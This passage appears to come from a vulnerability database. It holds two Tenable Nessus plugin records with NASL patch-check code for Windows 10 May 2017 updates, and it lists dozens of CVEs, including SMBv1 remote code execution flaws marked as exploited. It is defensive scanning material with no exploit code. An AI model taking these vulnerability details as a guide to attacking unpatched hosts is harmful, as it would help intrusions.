An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n 
\"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. 
(CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing 
security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n 
\"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It 